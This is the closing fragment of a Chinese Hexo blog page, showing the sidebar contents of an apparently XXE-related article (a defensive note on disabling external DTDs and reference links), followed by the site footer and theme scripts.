parser只能使用静态DTD，禁止外来引入；对于Java来说，直接设置相应的属性值为false即可</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x0B参考链接"><span class="nav-number">1.12.</span> <span class="nav-text">0x0B参考链接</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#https-www-freebuf-com-vuls-175451-htmls"><span class="nav-number">1.12.1.</span> <span class="nav-text">https://www.freebuf.com/vuls/175451.htmls</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#https-www-cnblogs-com-backlion-p-9302528-html"><span class="nav-number">1.12.2.</span> <span class="nav-text">https://www.cnblogs.com/backlion/p/9302528.html</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#https-mp-weixin-qq-com-s-VWofHp5lJLYnbw01copnkw"><span class="nav-number">1.12.3.</span> <span class="nav-text">https://mp.weixin.qq.com/s/VWofHp5lJLYnbw01copnkw</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#https-blog-csdn-net-u011721501-article-details-43775691"><span class="nav-number">1.12.4.</span> <span class="nav-text">https://blog.csdn.net/u011721501/article/details/43775691</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#https-www-cnblogs-com-backlion-p-9302528-html-1"><span class="nav-number">1.12.5.</span> <span class="nav-text">https://www.cnblogs.com/backlion/p/9302528.html</span></a></li></ol></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ljdd520</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">197.6k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
